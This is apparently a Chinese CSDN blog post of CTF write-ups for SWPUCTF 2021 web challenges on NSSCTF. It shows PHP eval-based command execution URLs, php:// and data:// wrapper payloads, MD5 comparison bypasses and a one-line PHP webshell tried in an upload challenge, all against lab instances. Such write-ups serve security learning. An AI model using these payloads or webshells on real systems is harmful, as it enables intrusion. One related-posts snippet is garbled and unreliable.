【NSSCTF】刷题记录——[SWPUCTF 2021 新生赛]系列(WEB篇)

已于 2023-08-10 10:51:41 修改
阅读量2.5k 收藏 7
点赞数
文章标签: 程序人生
于 2023-08-08 16:08:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jameshuangchuan/article/details/132159409
版权

新手小白,开启CTF刷题之路(持续更新)

此处主要在NSSCTF平台(NSSCTF | 在线CTF平台)上开展刷题

[SWPUCTF 2021 新生赛]gift_F12

环境打开如下:

根据题目提示,直接F12看源码

 flag get

 [SWPUCTF 2021 新生赛]easyrce

打开环境后,显示源码如下

<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['url']))
{
eval($_GET['url']);
}
?>

审查源码可知,要求传入参数url,构造payload如下

http://node1.anna.nssctf.cn:28985/?url=ls

返回如下,无回显

查询eval函数使用方法可知:eval — 把字符串作为PHP代码执行,因此需要在eval函数内构造包含系统函数的PHP语句,据此,构造payload 

http://node1.anna.nssctf.cn:28985/?url=system("ls");

测试结果

现在就是找flag了,再次构造payload,利用Linux特性,使用;号并行执行命令开展测试,直至发现疑似flag的文件

http://node1.anna.nssctf.cn:28985/?url=system(%22cd%20..;cd%20..;cd%20..;ls%22);

 构造payload查看flllllaaaaaaggggggg

http://node1.anna.nssctf.cn:28985/?url=system(%22cd%20..;cd%20..;cd%20..;cat%20flllllaaaaaaggggggg%22);

 flag get

[SWPUCTF 2021 新生赛]PseudoProtocols

 打开环境,显示如下:

根据题目PseudoProtocols,应该是采用伪协议读取hint.php,因此构造payload

http://node2.anna.nssctf.cn:28924/index.php?wllm=php://filter/read=convert.base64-encode/resource=./hint.php

执行回显如下:

出现的字符串丢进base64转码器解码,获得结果:

<?php
//go to /test2222222222222.php
?>

好家伙,还有一层,继续构造payload 

http://node2.anna.nssctf.cn:28924/index.php?wllm=test2222222222222.php

回显如下:

审查代码,发现要求传入参数a,且a通过file_get_contents函数值获取的值为I want flag时获得flag(注:file_get_contents函数 — 将整个文件读入一个字符串,使用语法为:file_get_contents(filename, include_path, context, start, max_length))。

那么,考虑使用PHP伪协议中的data协议传参(参考PHP伪协议_慕晨sekurlsa的博客-CSDN博客),因此构造payload如下:

http://node2.anna.nssctf.cn:28924/test2222222222222.php/?a=data://text/plain;base64,SSB3YW50IGZsYWc=

flag get

 [SWPUCTF 2021 新生赛]easy_md5

打开环境,代码如下:

<?php 
 highlight_file(__FILE__);
 include 'flag2.php';
 
if (isset($_GET['name']) && isset($_POST['password'])){
    $name = $_GET['name'];
    $password = $_POST['password'];
    if ($name != $password && md5($name) == md5($password)){
        echo $flag;
    }
    else {
        echo "wrong!";
    }
 
}
else {
    echo 'wrong!';
}
?>

审计代码,发现题目要求为,使用GET方式传入name参数,使用POST方式传入password参数,且两个参数值的md5值相等。

此题为典型的md5绕过,因此参考MD5绕过_H3rmesk1t的博客-CSDN博客

构造payload如下:

flag get

注,上个方法中,采用传入数组方式解题,因md5()函数在对数组进行编码时,会导致报错返回NULL值,故传参name[]=1和password[]=2使得两者md5值均为NULL。

方法二为采用科学计数法绕过。

PHP存在一种特性为,将科学计数法0e*****作为0计算,因此当两个参数经md5加密后,表现形式为0e开头时,两者即被认为相等,参考MD5 函数的绕过_md5绕过_菜菜zhao的博客-CSDN博客,分别构造payload如下:

执行后同样可以获得结果。

[SWPUCTF 2021 新生赛]easyupload1.0 

打开环境,显示如下:

尝试上传一句话木马:

<?php eval($_POST[1]);?>

虽然知道肯定不会这么简单,但,人嘛

果然啪啪打脸:

好吧,那就上个图片马,上传时使用BP抓包修改为PHP后缀试试:

然后提示文件太大了……

最低0.47元/天 解锁文章
SebastianH_
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
NSSCTF (3)
qq_61988806的博客
05-11 531
我们打开js源码很明显这里当score大于60会出flag我们寻找到了getScore方法所在的地方之后发现他存在于Snake.prototype中再控制台中给getScore赋值再空格页面。
[SWPUCTF 2021 新生]traditional
03-15
[SWPUCTF 2021 新生]traditional
NSSCTF
weixin_43896504的博客
07-22 2281
NSSCTF
[SWPUCTF 2021 新生]gift_F12
最新发布
l181954187的博客
04-17 140
来到页面,看见在10月23日0点整,flag将会出现在这里,请拭目以待吧![SWPUCTF 2021 新生]gift_F12。直接ctrl f搜索flag。然后没有发现什么有用的东西。那就直接F12看源码。
NSSCTF做题
wwwwyyyrre的博客
09-24 561
打开题目 发现是登录的界面 用admin和password试一下发现不行用dirsearch扫一下发现了git泄露 但是用githack下载不下来文件 去网上查了一下webftp 发现是一个在线php文件管理系统在这博客中提到,引用一下发现能直接登录phpinfo.php 拿到flag。
NSSCTF刷题
m0_63711447的博客
03-19 420
preg_match() 函数:用于进行正则表达式匹配,成功返回 1 ,否则返回 0intval ():获取变量的整数值isset()函数:在php中用来判断变量是否声明,该函数返回布尔类型的值,即true/false。isset只能用于变量,传递任何其它参数都将造成解析错误。is_string():用于检测变量是否是字符串看代码发现有三个if条件需要绕过第一个:用post对a进行传参,参数不能包含0-9的数字且要是整型绕过preg_match()函数可以用数组绕过显示go on,成功绕过。
NSSCTF做题(5)
wwwwyyyrre的博客
09-30 7926
注意 PHP>=5.3.0压缩包需要是zip协议压缩,rar不行,将木马文件压缩后,改为其他任意格式的文件都可以正常使用。然后,将文件的内容作为响应返回。其中a,b1,b2都可以用数组绕过,因为a是正则绕过,b是MD5绕过,接下来看c c强调了要传入c1不等于c2 c1,c2都要是字符串,c1c2的MD5值要相等 所以c就不能用数组绕过,可以用科学计数法0e绕过。它检查请求中是否包含文件,将文件保存到目录中,使用 生成唯一 ID,将 ID 和文件路径插入到数据库中的表中,最后将用户重定向到路由。
NSSCTF题解
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
03-17 974
首先看这个代码的逻辑,我们的可控点是content,同时可以写入文件进去,在unzip函数中extractTo可以解压/tmp的文件到$_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename),然后经过一大堆过滤,最后就是unlink删除文件,所以我们可以进行条件竞争,在解压文件和删除文件进行竞争。就可以查询出flag。响应中的hash值随着name参数的变化而变化,但又不完全是md5加密的值,这里看提示后,直接构造payload。
nssctf文件test
03-30
1
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
比较经典的虚拟机的题目是南邮的cg-ctf的题目, 然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也...
apachecn#apachecn-ctf-wiki#CTF-AWD靶场搭建和第一题题解_星星明亮的博客-CSDN博客_awd靶
07-25
1.根据当前队伍数量copy所有的队伍的比文件夹: 2.启动比: 1.每个队伍分配到一个docker主机,给定ctf用户权限,通过制定的端口和密码进行连接
nssctf web入门(4)
qq_61988806的博客
04-16 665
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10
nssctf web 入门(6)
qq_61988806的博客
04-17 1196
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10
NSSCTF web学习
akxnxbshai的博客
09-30 1173
NSSCTF web刷题
nssctf web入门(2)
qq_61988806的博客
04-13 786
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10
nssctf web 入门(3)
qq_61988806的博客
04-13 1130
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10
NSSCTF web记录
m0_64815693的博客
11-08 9329
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生]babyunser [TQLCTF 2022]simple_bypass
nssctf web 入门(9)
qq_61988806的博客
04-18 239
可以猜测做了过滤这里可以bp跑一下看过滤了哪些尝试发现过滤了空格/**/在sql中代表注释符在mysql中这个可以用来代表空格发现--+被过滤#也不行我们试下url编码的#也就是%23成功了3个字段得到库名test_db这里提示非法操作经过尝试发现=被过滤在sql中like用于判断一个字符串是否匹配某个模式这里要在3的字段不然会报错?这里和之前的sql一样就不详细解释了如果不知道可以去看第8里面详细讲了这里就把空格换成了/**/和把=换成了like?在查询flag。
NSSCTF fakerandom
m0_63735735的博客
08-05 373
NSSCTF fakerandom
nssctf的jwt问3
08-17
首先将图像的背景填充为白色。 2. 在保存图片时,使用 `ImageIO.write()` 方法将二维码图像保存为 PNG 格式的图片文件。 3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问题。我是一个与开发者有关的 AI,.BufferedImage` 和 `javax.imageio.ImageIO` 类。 您可以根据需要修改保存图片的路径和文件名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值